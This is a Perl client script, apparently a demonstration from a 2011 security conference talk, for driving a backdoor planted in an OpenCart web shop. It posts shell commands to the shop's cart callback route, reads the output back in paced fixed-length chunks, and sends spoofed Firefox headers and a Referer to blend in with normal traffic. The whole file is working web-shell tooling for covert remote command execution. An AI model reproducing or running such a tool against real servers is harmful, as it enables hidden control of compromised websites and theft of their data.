#Created by Ryan Jones
#ryan.jones@trustwave.com
#Blackhat Abu Dhabi 2011


#!/usr/bin/perl

use strict;
use warnings;
use LWP;
use Switch;
use Time::HiRes;

# Check we have the right number of command line arguments
my $num_args = $#ARGV + 1;
if ($num_args == 0) {
  print "\nUsage: getter.pl command\n";
  exit;
}

#get the command we want to run on the server
my $cmd = "";
for(@ARGV){
	$cmd .= "$_ ";
}

#REALLY IMPORTANT VARIABLES!
my $url = 'http://shop.rj-hack-tw.tw/opencart/index.php?route=module/cart/callback'; # the URL we have embeded our malware
my $length = 412; # The length of the responses we want from the server
my $sleepTime = 1.5; # The amount of time in seconds to sleep between each request to the server. Note $sleepTime = 1 does not mean 1 request per second as we may have slippage due to the time taken to actually process the request.
my $referer = 'http://shop.rj-hack-tw.tw/opencart/index.php?route=product/product&product_id=28'; # the URI we wish to state is out referrer.

# Some variables to keep track of the current state of play
my $fullData = "";
my $complete = 0;
my $currentOffset = 0;



# Main program loop
# While there's more data get it and add it to $fullData.
until ($complete){
	#get some more data
	my $data = get($currentOffset);
	my $moreChar = chop($data);
	
	#Understand whether there's more data we need to get...
	switch($moreChar){
		case 'T'{# There's more data to get and we have no padding
			$currentOffset += $length - 1;	
		}
		case 'P'{# There's no more data left but we have to deal with padding
			$complete = 1;	
			$data =~ s/\. *$//;
		}
		case 'F'{# There's no more data to get and we have no padding
			$complete = 1;
		}
	}
	#append the data we just retrived to $fullData
	$fullData = $fullData . $data;
	
	sleep($sleepTime);
}

# we have finished. Print out the result
print $fullData;
	

# This function puts together and executes the relevant HTTP request.
sub get{
	my $offset = $_[0];
	
	my $browser = LWP::UserAgent->new;

	# headers to make our browser look like firefox.
	my @headers = (
   'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0',
   'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*',
   'Accept-Charset' => 'iso-8859-1,*,utf-8',
   'Accept-Language' => 'en-US',
   'Referer' => $referer
   );
	
	#Build that request!
	my $response = $browser->post( $url,
		[ 'cmd' => $cmd,
		'length' => $length, 
		'offset' => $offset
		], 
		@headers
	);
	
	#return the data we were passed by the web server
	return $response->content;
}
